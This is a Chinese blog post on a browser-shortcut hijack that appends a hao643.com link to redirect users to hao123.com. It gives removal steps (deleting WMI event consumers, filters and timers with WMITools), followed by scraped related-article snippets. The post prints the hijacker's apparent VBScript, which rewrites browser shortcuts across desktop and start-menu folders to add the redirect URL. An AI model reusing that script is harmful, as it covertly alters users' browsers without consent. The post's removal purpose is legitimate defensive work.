hao643.com劫持(IE和Chrome等被修改快捷方式跳转到hao123.com)

最近下载了某个软件,安装后IE和Chrome的Startup Page均被重定向到hao123.com。
查看IE和Chrome的配置选型,没发现问题。
后来发现是快捷方式后边多了一串字符串 "http://hao643.com/?r=ggggg&m=d40"
删除后,经过一段时间,还会再次出现。再删再出现。
不亏是百度旗下的干将!

那么怎么清除呢?
网上中文、英文诸多介绍,既有专杀也有通杀,试了几个均不理想。
后来,因缘巧合得到了解决方法,如下:
1.下载并安装WMITools(http://www.pc18.com/soft/15730.html)
2.以管理员身份打开 C:\Program Files (x86)\WMI Tools\wbemeventviewer.exe
3.点击左上角按钮register for events
4.OK--OK
5.第1个下拉菜单有3个选择项:Consumers、Filters、Timers
6.把这3个选择项下的所有实例全部删除(右键菜单,Delete instance)
//注意,根节点无法删除,点开到具体的instance
7.去掉所有浏览器快捷方式的尾巴--涉及浏览器:114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8.搞定收工。

参考文章:
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
http://www.cnblogs.com/chenshao/p/6854790.html

具体代码如下:

 1 On Error Resume Next:
 2 Const link = "http://hao643.com/?r=ggggg&m=d40":
 3 Const link360 = "http://hao643.com/?r=ggggg&m=d40&s=3":
 4 browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":
 5 lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Admin\Desktop,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":
 6 browsersArr = split(browsers,","):
 7 Set oDic = CreateObject("scripting.dictionary"):
 8 For Each browser In browsersArr:
 9     oDic.Add LCase(browser), browser:
10 Next:
11 lnkpathsArr = split(lnkpaths,","):
12 Set oFolders = CreateObject("scripting.dictionary"):
13 For Each lnkpath In lnkpathsArr:
14     oFolders.Add lnkpath, lnkpath:
15 Next:
16 Set fso = CreateObject("Scripting.Filesystemobject"):
17 Set WshShell = CreateObject("Wscript.Shell"):
18 For Each oFolder In oFolders:
19     If fso.FolderExists(oFolder) Then:
20         For Each file In fso.GetFolder(oFolder).Files:
21             If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:
22                 Set oShellLink = WshShell.CreateShortcut(file.Path):
23                 path = oShellLink.TargetPath:
24                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):
25                 If oDic.Exists(LCase(name)) Then:
26                     If LCase(name) = LCase("360se.exe") Then:
27                         oShellLink.Arguments = link360:
28                     Else:
29                         oShellLink.Arguments = link:
30                     End If:
31                     If file.Attributes And 1 Then:
32                         file.Attributes = file.Attributes - 1:
33                     End If:
34                     oShellLink.Save:
35                 End If:
36             End If:
37             Next:
38     End If:
39 Next:
时间: 2024-11-14 03:53:02

hao643.com劫持(IE和Chrome等被修改快捷方式跳转到hao123.com)的相关文章

hao643.com劫持(修改快捷方式跳转至hao123.com)

>症状:所有浏览器快捷方式,都被加上尾巴,例如IE的:"C:\Program Files\Internet Explorer\iexplore.exe" http://hao643.com/?r=ggggg&m=c104手工去掉尾巴后,每隔一定时间(网友说是30分钟)后,尾巴重新被加上.PS:这病毒仅修改快捷方式,应该没有其它病毒特征. >解决方案:1.安装WMITools(点击下载)2.管理员身份打开 C:\Program Files (x86)\WMI Tool

Chrome 的滚动条修改.

该方法针对于win下Chrome任何版本(未测试基于Chrome内核的其他浏览器),Lunix就是目录换了一下 目录是:**\Google\Chrome\User Data\Profile 2\User StyleSheets 目录可能会变...但是最后肯定是StyleSheets. 文件肯定是下面的这个 然后看到一个叫Custom的css文件 右键编辑 代码: ::-webkit-scrollbar-track-piece{ background-color:#fff; -webkit-bor

Chrome 浏览器主页被 360、2345、hao123 篡改

解决方法一: 桌面找到浏览器快捷方式,右键“属性” 查看“目标(T)”软件地址栏看下最后面是否带有小尾巴,例如:https://www.2345.com/?38456-0001,将其删除确定即可. 解决方式二: 在 chrome 浏览器地址栏中输入 chrome://version,此时会跳转到“关于版本”相关页面, 找到其中“命令行”属性复制后,删除或修改尾部 https 链接地址为你要访问的主页,然后替换 桌面快捷方式>属性>目标(T) 中的路径即可. 解决方法三: 直接给“桌面快捷方式”

chrome浏览器地址栏搜索被强制跳转,百度搜索引擎代码

正常在地址栏输入信息,搜索会自动调用默认搜索引擎,但现在不能这样,比如先跳转到搜索引擎的首页,然后在输入一次.很是麻烦! 估计是360卫士的浏览器锁定造成的,于是解除锁定,依旧是这样,很是烦躁,可能是我的强迫症,实在不愿意多一次跳转,重复两次搜索内容. 于是上网翻了百度的默认搜索代码,百度自己不知道藏在哪里(吐槽百度全家桶,用户体验太差,要不是谷歌离开中国,估计早倒闭了),没办法,还是从360浏览器的搜索引擎里翻出来的.感谢百度的对手们!以上这段都是废话! 简单的东西, 保存一下,免得以后自己又

Chrome浏览器任意修改网页内容

在Chrome浏览器按F12,打开开发者工具,切换到console选项卡: 在下面的输入行输入下面的命令回车: document.body.contentEditable="true" 再单击页面上的任意文本就可以直接编辑了: 这个是利用了H5的contentEditable属性 .

linux下google chrome浏览器字体修改

今天安装了最新的chrome,我是下载的.deb包直接安装的. 安装完后,用chrome浏览页面时,发现字体有的大,有的小,还不清楚. 于是在网上搜索了一下如何设置字体. 1.打开Chrome浏览器.选项->高级设置->(往下面拖一下)网页内容->更改字体和语言设置 2.将Serif字体修改成 Sans 16,Sans-Serif字体修改成 Sans 16,宽度固定字体:修改成Monospace 13 ;

centos redhat linux下如何怎么安装google chrome 设置谷歌浏览器桌面快捷方式

1.我电脑之前已经安装了google浏览器,用方便的yum命令卸载调,命令为: yum remove google-chrome-stable.x86_64 2. 现在国内google基本上被墙,已经下载不了,而且centos浏览器有火狐,就默认不支持google-chrome,只能修改yum源进行安装 在/etc/yum.repos.d/目录创建新的文本文件,命名google-chrome.repo,文本文件内容如下 [google-chrome] name=google-chrome bas

Chrome 如何查看/修改Cookie

chrome浏览器首页被hao123劫持解决办法

在chrome浏览器设置里面将新标签页地址改为www.baidu.com, 不过一般来说这个办法完全没用,因为我们面对的是史无前例的大流氓. 查看桌面chrome的快捷方式是否被篡改.右键快捷方式,点击属性,切换到如下选项卡,观察目标位置是否正确.  如果不正确,将该快捷方式删除.找到chrome安装文件夹,将chrome.exe重新建立快捷方式即可. 3. 有一种可能是百度这流氓入侵了explorer.exe, 当用户运行chrome时,其实是explorer在执行命令.所以由于被劫持的 ex